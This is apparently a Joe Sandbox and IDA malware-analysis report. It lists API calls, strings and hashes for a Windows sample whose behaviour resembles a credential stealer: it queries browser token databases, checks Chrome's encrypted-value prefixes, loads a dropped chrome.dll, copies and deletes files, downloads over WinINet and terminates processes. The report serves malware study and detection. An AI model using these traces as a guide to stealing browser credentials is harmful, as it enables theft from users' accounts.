                                              • Part of subcall function 02464DC7: FindNextFileA.KERNEL32(000000FF,?), ref: 02465034
                                              • Part of subcall function 02464DC7: FindClose.KERNEL32(000000FF), ref: 02465049
                                            • memset.MSVCRT ref: 02465356
                                            • lstrcat.KERNEL32(?,00000000), ref: 0246537F
                                            • lstrcat.KERNEL32(?,00421020), ref: 0246539C
                                              • Part of subcall function 02464DC7: wsprintfA.USER32 ref: 02464E67
                                              • Part of subcall function 02464DC7: StrCmpCA.SHLWAPI(?,004208D3), ref: 02464E7C
                                              • Part of subcall function 02464DC7: wsprintfA.USER32 ref: 02464E99
                                              • Part of subcall function 02464DC7: PathMatchSpecA.SHLWAPI(?,?), ref: 02464ED5
                                              • Part of subcall function 02464DC7: lstrcat.KERNEL32(?,006D6F24), ref: 02464F01
                                              • Part of subcall function 02464DC7: lstrcat.KERNEL32(?,00420FE0), ref: 02464F13
                                              • Part of subcall function 02464DC7: lstrcat.KERNEL32(?,?), ref: 02464F27
                                              • Part of subcall function 02464DC7: lstrcat.KERNEL32(?,00420FE4), ref: 02464F39
                                              • Part of subcall function 02464DC7: lstrcat.KERNEL32(?,?), ref: 02464F4D
                                              • Part of subcall function 02464DC7: CopyFileA.KERNEL32(?,?,00000001), ref: 02464F63
                                              • Part of subcall function 02464DC7: DeleteFileA.KERNEL32(?), ref: 02464FE8
                                            • memset.MSVCRT ref: 024653E2
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929625361.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2450000_XJQkTVvJ3I.jbxd
                                            Similarity
                                            • API ID: lstrcat$Filememset$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                                            • String ID:
                                            • API String ID: 4017274736-0
                                            APIs
                                            • type_info::operator==.LIBVCRUNTIME ref: 024CF6B4
                                            • ___TypeMatch.LIBVCRUNTIME ref: 024CF7C2
                                            • CatchIt.LIBVCRUNTIME ref: 024CF813
                                            • CallUnexpected.LIBVCRUNTIME ref: 024CF92F
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929625361.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2450000_XJQkTVvJ3I.jbxd
                                            Similarity
                                            • API ID: CallCatchMatchTypeUnexpectedtype_info::operator==
                                            • String ID: csm$csm$csm
                                            • API String ID: 2356445960-393685449
                                            APIs
                                            • ??_U@YAPAXI@Z.MSVCRT(00064000), ref: 0041735E
                                              • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                            • OpenProcess.KERNEL32(001FFFFF,00000000,0041758D,004205C5), ref: 0041739C
                                            • memset.MSVCRT ref: 004173EA
                                            • ??_V@YAXPAX@Z.MSVCRT(?), ref: 0041753E
                                            Strings
                                            • 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 0041740C
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929017160.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                             • Associated: 00000000.00000002.1929017160.000000000053D000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1929017160.0000000000549000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1929017160.000000000056E000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1929017160.00000000006D6000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1929017160.00000000006E8000.00000040.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_XJQkTVvJ3I.jbxd
                                            Similarity
                                            • API ID: OpenProcesslstrcpymemset
                                            • String ID: 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30
                                            • API String ID: 224852652-4138519520
                                            APIs
                                              • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                              • Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
                                              • Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
                                              • Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22
                                              • Part of subcall function 0041AC30: lstrcpy.KERNEL32(00000000,?), ref: 0041AC82
                                              • Part of subcall function 0041AC30: lstrcatA.KERNEL32(00000000), ref: 0041AC92
                                              • Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15
                                              • Part of subcall function 0041AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0041AAF6
                                              • Part of subcall function 0040A560: memcmp.MSVCRT(?,v20,00000003), ref: 0040A57D
                                            • lstrlenA.KERNEL32(00000000), ref: 0040BC6F
                                              • Part of subcall function 00418FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00418FE2
                                            • StrStrA.SHLWAPI(00000000,AccountId), ref: 0040BC9D
                                            • lstrlenA.KERNEL32(00000000), ref: 0040BD75
                                            • lstrlenA.KERNEL32(00000000), ref: 0040BD89
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929017160.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                             • Associated: 00000000.00000002.1929017160.000000000053D000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1929017160.0000000000549000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1929017160.000000000056E000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1929017160.00000000006D6000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1929017160.00000000006E8000.00000040.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_XJQkTVvJ3I.jbxd
                                            Similarity
                                            • API ID: lstrcpy$lstrlen$lstrcat$AllocLocalmemcmp
                                            • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                                            • API String ID: 1440504306-1079375795
                                            APIs
                                            • LoadLibraryA.KERNEL32(C:\ProgramData\chrome.dll,?,004108E4), ref: 0040A098
                                            • GetProcAddress.KERNEL32(00000000,connect_to_websocket), ref: 0040A0BE
                                            • GetProcAddress.KERNEL32(00000000,free_result), ref: 0040A0D5
                                            • FreeLibrary.KERNEL32(00000000,?,004108E4), ref: 0040A0F9
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929017160.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                             • Associated: 00000000.00000002.1929017160.000000000053D000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1929017160.0000000000549000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1929017160.000000000056E000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1929017160.00000000006D6000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1929017160.00000000006E8000.00000040.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_XJQkTVvJ3I.jbxd
                                            Similarity
                                            • API ID: AddressLibraryProc$FreeLoad
                                            • String ID: C:\ProgramData\chrome.dll$connect_to_websocket$free_result
                                            • API String ID: 2256533930-1545816527
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929017160.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                             • Associated: 00000000.00000002.1929017160.000000000053D000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1929017160.0000000000549000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1929017160.000000000056E000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1929017160.00000000006D6000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1929017160.00000000006E8000.00000040.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_XJQkTVvJ3I.jbxd
                                            Similarity
                                            • API ID: ExitProcess$DefaultLangUser
                                            • String ID: *
                                            • API String ID: 1494266314-163128923
                                            APIs
                                              • Part of subcall function 02457597: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 02457601
                                              • Part of subcall function 02457597: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 02457678
                                              • Part of subcall function 02457597: StrStrA.SHLWAPI(00000000,0042191C,00000000), ref: 024576D4
                                              • Part of subcall function 02457597: GetProcessHeap.KERNEL32(00000000,?), ref: 02457719
                                              • Part of subcall function 02457597: HeapFree.KERNEL32(00000000), ref: 02457720
                                            • lstrcat.KERNEL32(006D7068,0042192C), ref: 024578CD
                                            • lstrcat.KERNEL32(006D7068,00000000), ref: 0245790F
                                            • lstrcat.KERNEL32(006D7068,00421930), ref: 02457921
                                            • lstrcat.KERNEL32(006D7068,00000000), ref: 02457956
                                            • lstrcat.KERNEL32(006D7068,00421934), ref: 02457967
                                            • lstrcat.KERNEL32(006D7068,00000000), ref: 0245799A
                                            • lstrcat.KERNEL32(006D7068,00421938), ref: 024579B4
                                            • task.LIBCPMTD ref: 024579C2
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929625361.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2450000_XJQkTVvJ3I.jbxd
                                            Similarity
                                            • API ID: lstrcat$Heap$EnumFreeOpenProcessValuetask
                                            • String ID:
                                            • API String ID: 2677904052-0
                                            APIs
                                            • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 02455281
                                            • RtlAllocateHeap.NTDLL(00000000), ref: 02455288
                                            • InternetOpenA.WININET(00420DE3,00000000,00000000,00000000,00000000), ref: 024552A1
                                            • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 024552C8
                                            • InternetReadFile.WININET(?,?,00000400,00000000), ref: 024552F8
                                            • memcpy.MSVCRT(00000000,?,00000001), ref: 02455341
                                            • InternetCloseHandle.WININET(?), ref: 02455370
                                            • InternetCloseHandle.WININET(?), ref: 0245537D
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929625361.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2450000_XJQkTVvJ3I.jbxd
                                            Similarity
                                            • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessReadmemcpy
                                            • String ID:
                                            • API String ID: 1008454911-0
                                            APIs
                                              • Part of subcall function 0246AD97: lstrlen.KERNEL32(024551BC,?,?,024551BC,00420DDF), ref: 0246ADA2
                                              • Part of subcall function 0246AD97: lstrcpy.KERNEL32(00420DDF,00000000), ref: 0246ADFC
                                              • Part of subcall function 0246ACB7: lstrcpy.KERNEL32(00420E1A,00000000), ref: 0246ACFF
                                            • StrCmpCA.SHLWAPI(00000000,004210B0,00000000), ref: 02465AFB
                                            • StrCmpCA.SHLWAPI(00000000,004210B8), ref: 02465B58
                                            • StrCmpCA.SHLWAPI(00000000,004210C8), ref: 02465D0E
                                              • Part of subcall function 0246AD17: lstrcpy.KERNEL32(?,00000000), ref: 0246AD5D
                                              • Part of subcall function 024656A7: StrCmpCA.SHLWAPI(00000000,00421074), ref: 024656DF
                                              • Part of subcall function 0246AE17: lstrcpy.KERNEL32(?,00420E1A), ref: 0246AE7C
                                              • Part of subcall function 02465777: StrCmpCA.SHLWAPI(00000000,00421084,00000000), ref: 024657CF
                                              • Part of subcall function 02465777: lstrlen.KERNEL32(00000000), ref: 024657E6
                                              • Part of subcall function 02465777: StrStrA.SHLWAPI(00000000,00000000), ref: 0246581B
                                              • Part of subcall function 02465777: lstrlen.KERNEL32(00000000), ref: 0246583A
                                              • Part of subcall function 02465777: strtok.MSVCRT(00000000,?), ref: 02465855
                                              • Part of subcall function 02465777: lstrlen.KERNEL32(00000000), ref: 02465865
                                            • StrCmpCA.SHLWAPI(00000000,004210C0,00000000), ref: 02465C42
                                            • StrCmpCA.SHLWAPI(00000000,004210D0,00000000), ref: 02465DF7
                                            • StrCmpCA.SHLWAPI(00000000,004210D8), ref: 02465EC3
                                            • Sleep.KERNEL32(0000EA60), ref: 02465ED2
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929625361.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2450000_XJQkTVvJ3I.jbxd
                                            Similarity
                                            • API ID: lstrcpylstrlen$Sleepstrtok
                                            • String ID:
                                            • API String ID: 3630751533-0
                                            APIs
                                              • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                              • Part of subcall function 00419850: CreateFileA.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,?,004108DC,C:\ProgramData\chrome.dll), ref: 00419871
                                              • Part of subcall function 0040A090: LoadLibraryA.KERNEL32(C:\ProgramData\chrome.dll,?,004108E4), ref: 0040A098
                                            • StrCmpCA.SHLWAPI(00000000,009C9630), ref: 00410922
                                            • StrCmpCA.SHLWAPI(00000000,009C96B0), ref: 00410B79
                                            • StrCmpCA.SHLWAPI(00000000,009C9600), ref: 00410A0C
                                              • Part of subcall function 0041AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0041AAF6
                                            • DeleteFileA.KERNEL32(C:\ProgramData\chrome.dll), ref: 00410C35
                                            Strings
                                            • C:\ProgramData\chrome.dll, xrefs: 004108CD
                                            • C:\ProgramData\chrome.dll, xrefs: 00410C30
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929017160.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                             • Associated: 00000000.00000002.1929017160.000000000053D000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1929017160.0000000000549000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1929017160.000000000056E000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1929017160.00000000006D6000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1929017160.00000000006E8000.00000040.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_XJQkTVvJ3I.jbxd
                                            Similarity
                                            • API ID: Filelstrcpy$CreateDeleteLibraryLoad
                                            • String ID: C:\ProgramData\chrome.dll$C:\ProgramData\chrome.dll
                                            • API String ID: 585553867-663540502
                                            APIs
                                            • memcmp.MSVCRT(?,v20,00000003), ref: 0040A57D
                                              • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                            • memcmp.MSVCRT(?,v10,00000003), ref: 0040A5D2
                                            • memset.MSVCRT ref: 0040A60B
                                            • LocalAlloc.KERNEL32(00000040,?), ref: 0040A664
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929017160.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                             • Associated: 00000000.00000002.1929017160.000000000053D000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1929017160.0000000000549000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1929017160.000000000056E000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1929017160.00000000006D6000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1929017160.00000000006E8000.00000040.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_XJQkTVvJ3I.jbxd
                                            Similarity
                                            • API ID: memcmp$AllocLocallstrcpymemset
                                            • String ID: @$v10$v20
                                            • API String ID: 631489823-278772428
                                            APIs
                                            • memset.MSVCRT ref: 0245158E
                                              • Part of subcall function 02451507: GetProcessHeap.KERNEL32(00000000,00000104), ref: 0245151B
                                              • Part of subcall function 02451507: RtlAllocateHeap.NTDLL(00000000), ref: 02451522
                                              • Part of subcall function 02451507: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 0245153E
                                              • Part of subcall function 02451507: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 0245155C
                                              • Part of subcall function 02451507: RegCloseKey.ADVAPI32(?), ref: 02451566
                                            • lstrcat.KERNEL32(?,00000000), ref: 024515B6
                                            • lstrlen.KERNEL32(?), ref: 024515C3
                                            • lstrcat.KERNEL32(?,00426414), ref: 024515DE
                                              • Part of subcall function 0246ACB7: lstrcpy.KERNEL32(00420E1A,00000000), ref: 0246ACFF
                                              • Part of subcall function 0246AF27: lstrlen.KERNEL32(?,006D6BF0,?,004250E4,00420E1A), ref: 0246AF3C
                                              • Part of subcall function 0246AF27: lstrcpy.KERNEL32(00000000), ref: 0246AF7B
                                              • Part of subcall function 0246AF27: lstrcat.KERNEL32(00000000,00000000), ref: 0246AF89
                                              • Part of subcall function 0246AE17: lstrcpy.KERNEL32(?,00420E1A), ref: 0246AE7C
                                              • Part of subcall function 02468F57: GetSystemTime.KERNEL32(00420E1B,006D6CA4,004205B6,?,?,02451660,?,0000001A,00420E1B,00000000,?,006D6BF0,?,004250E4,00420E1A), ref: 02468F7D
                                              • Part of subcall function 0246AE97: lstrcpy.KERNEL32(00000000,?), ref: 0246AEE9
                                              • Part of subcall function 0246AE97: lstrcat.KERNEL32(00000000), ref: 0246AEF9
                                            • CopyFileA.KERNEL32(?,00000000,00000001), ref: 024516CC
                                              • Part of subcall function 0246AD17: lstrcpy.KERNEL32(?,00000000), ref: 0246AD5D
                                              • Part of subcall function 0245A377: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0245A3A3
                                              • Part of subcall function 0245A377: GetFileSizeEx.KERNEL32(000000FF,?), ref: 0245A3C8
                                              • Part of subcall function 0245A377: LocalAlloc.KERNEL32(00000040,?), ref: 0245A3E8
                                              • Part of subcall function 0245A377: ReadFile.KERNEL32(000000FF,?,00000000,024516F6,00000000), ref: 0245A411
                                              • Part of subcall function 0245A377: LocalFree.KERNEL32(024516F6), ref: 0245A447
                                              • Part of subcall function 0245A377: CloseHandle.KERNEL32(000000FF), ref: 0245A451
                                            • DeleteFileA.KERNEL32(00000000), ref: 02451756
                                            • memset.MSVCRT ref: 0245177D
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929625361.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2450000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlenmemset$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                                            • String ID:
                                            • API String ID: 3885987321-0
                                            • Opcode ID: 9501ecd15ebe4f0bd675d82c20a0d288bf0466f34ff5fe808b0cf600256a10e0
                                            • Instruction ID: 3c0b6b25f77c957b2ea242d158c0127a4b2911392d59b63edc65d8ae69b5b275
                                            • Opcode Fuzzy Hash: 9501ecd15ebe4f0bd675d82c20a0d288bf0466f34ff5fe808b0cf600256a10e0
                                            • Instruction Fuzzy Hash: 735142B1D406286BCB19FB61DC94EFD733AAF54701F4045EEA64A72091EE305B88CE56
                                            APIs
                                            • lstrcatA.KERNEL32(?,009D0750,?,00000104,?,00000104,?,00000104,?,00000104), ref: 00414A2B
                                              • Part of subcall function 00418F70: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418F9B
                                            • lstrcatA.KERNEL32(?,00000000), ref: 00414A51
                                            • lstrcatA.KERNEL32(?,?), ref: 00414A70
                                            • lstrcatA.KERNEL32(?,?), ref: 00414A84
                                            • lstrcatA.KERNEL32(?,009CC228), ref: 00414A97
                                            • lstrcatA.KERNEL32(?,?), ref: 00414AAB
                                            • lstrcatA.KERNEL32(?,009D0EA8), ref: 00414ABF
                                              • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                              • Part of subcall function 00418F20: GetFileAttributesA.KERNEL32(00000000,?,00410277,?,00000000,?,00000000,00420DB2,00420DAF), ref: 00418F2F
                                              • Part of subcall function 004147C0: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 004147D0
                                              • Part of subcall function 004147C0: HeapAlloc.KERNEL32(00000000), ref: 004147D7
                                              • Part of subcall function 004147C0: wsprintfA.USER32 ref: 004147F6
                                              • Part of subcall function 004147C0: FindFirstFileA.KERNEL32(?,?), ref: 0041480D
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929017160.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                             • Associated: 00000000.00000002.1929017160.000000000053D000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1929017160.0000000000549000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1929017160.000000000056E000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1929017160.00000000006D6000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1929017160.00000000006E8000.00000040.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: lstrcat$FileHeap$AllocAttributesFindFirstFolderPathProcesslstrcpywsprintf
                                            • String ID:
                                            • API String ID: 167551676-0
                                            • Opcode ID: 58dba1b2860d6428ec47f78fe100ccd670a24cdb85e4827545ce54862c89c4bc
                                            • Instruction ID: a5c2d428b28de13255d2ac7946ab4b1842291e6be0275f36c7222d1bbee1b90f
                                            • Opcode Fuzzy Hash: 58dba1b2860d6428ec47f78fe100ccd670a24cdb85e4827545ce54862c89c4bc
                                            • Instruction Fuzzy Hash: F93160B2D0421867CB14FBB0DC95EDD733EAB48704F40458EB20596091EE78A7C8CB99
                                            APIs
                                            • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 004185B6
                                            • wsprintfA.USER32 ref: 004185E9
                                            • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 0041860B
                                            • RegCloseKey.ADVAPI32(00000000), ref: 0041861C
                                            • RegCloseKey.ADVAPI32(00000000), ref: 00418629
                                              • Part of subcall function 0041AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0041AAF6
                                            • RegQueryValueExA.ADVAPI32(00000000,009D0498,00000000,000F003F,?,00000400), ref: 0041867C
                                            • lstrlenA.KERNEL32(?), ref: 00418691
                                            • RegQueryValueExA.ADVAPI32(00000000,009D0438,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,00420B3C), ref: 00418729
                                            • RegCloseKey.ADVAPI32(00000000), ref: 00418798
                                            • RegCloseKey.ADVAPI32(00000000), ref: 004187AA
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929017160.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                             • Associated: 00000000.00000002.1929017160.000000000053D000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1929017160.0000000000549000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1929017160.000000000056E000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1929017160.00000000006D6000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1929017160.00000000006E8000.00000040.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                                            • String ID: %s\%s
                                            • API String ID: 3896182533-4073750446
                                            • Opcode ID: b35235786b948e0e6555158c1c0efb0b11028fcec8c55c6120cd3185db22f78a
                                            • Instruction ID: 130e8712b2d17d0f4a3aa70f9b32a38deb323cc32c4c6a80807e33934adfa5f1
                                            • Opcode Fuzzy Hash: b35235786b948e0e6555158c1c0efb0b11028fcec8c55c6120cd3185db22f78a
                                            • Instruction Fuzzy Hash: 0F211B71A112189BDB24DB54DC85FE9B3B9FB48704F1081D9E609A6180DF746AC5CF98
                                            APIs
                                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 004199C5
                                            • Process32First.KERNEL32(0040A056,00000128), ref: 004199D9
                                            • Process32Next.KERNEL32(0040A056,00000128), ref: 004199F2
                                            • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00419A4E
                                            • TerminateProcess.KERNEL32(00000000,00000000), ref: 00419A6C
                                            • CloseHandle.KERNEL32(00000000), ref: 00419A79
                                            • CloseHandle.KERNEL32(0040A056), ref: 00419A88
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929017160.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                             • Associated: 00000000.00000002.1929017160.000000000053D000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1929017160.0000000000549000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1929017160.000000000056E000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1929017160.00000000006D6000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1929017160.00000000006E8000.00000040.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: CloseHandleProcessProcess32$CreateFirstNextOpenSnapshotTerminateToolhelp32
                                            • String ID:
                                            • API String ID: 2696918072-0
                                            • Opcode ID: d164d69eee064959a682f4fee3bb2d75b95a0ad327ad163940014db5e985719e
                                            • Instruction ID: 88ad4043d03276f3ee8d31f644ab7db47d0d0c060b431017ba6a9ada5f45e9a4
                                            • Opcode Fuzzy Hash: d164d69eee064959a682f4fee3bb2d75b95a0ad327ad163940014db5e985719e
                                            • Instruction Fuzzy Hash: 06211A70900258ABDB25DFA1DC98BEEB7B9BF48304F0041C9E509A6290D7789FC4CF51
                                            APIs
                                            • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 02454AA1
                                            • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 02454AB8
                                            • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 02454ACF
                                            • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 02454AF0
                                            • InternetCrackUrlA.WININET(00000000,00000000), ref: 02454B00
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929625361.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2450000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: ??2@$CrackInternetlstrlen
                                            • String ID: <
                                            • API String ID: 1683549937-4251816714
                                            • Opcode ID: 38fa8a5d9863c97f5ae2059ef35c5811aeca24f1de16073e8a310d0be37fc7a1
                                            • Instruction ID: d9a9a47fd235f55d05545ab20c2df51f46e5de8092aedb49bb2e6a2a9ab080e0
                                            • Opcode Fuzzy Hash: 38fa8a5d9863c97f5ae2059ef35c5811aeca24f1de16073e8a310d0be37fc7a1
                                            • Instruction Fuzzy Hash: 95212C71D00219EBDF14DFA5EC49AED7B75FF44320F108229E925A7290EB706A05CF91
                                            APIs
                                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 02469C2C
                                            • Process32First.KERNEL32(0245A2BD,00000128), ref: 02469C40
                                            • Process32Next.KERNEL32(0245A2BD,00000128), ref: 02469C59
                                            • OpenProcess.KERNEL32(00000001,00000000,?), ref: 02469CB5
                                            • TerminateProcess.KERNEL32(00000000,00000000), ref: 02469CD3
                                            • CloseHandle.KERNEL32(00000000), ref: 02469CE0
                                            • CloseHandle.KERNEL32(0245A2BD), ref: 02469CEF
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929625361.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2450000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: CloseHandleProcessProcess32$CreateFirstNextOpenSnapshotTerminateToolhelp32
                                            • String ID:
                                            • API String ID: 2696918072-0
                                            • Opcode ID: d164d69eee064959a682f4fee3bb2d75b95a0ad327ad163940014db5e985719e
                                            • Instruction ID: 4f07c557e1940f6f261f1ea4e2410b3eba9bd4410bd074fc162b2e46e5d7411f
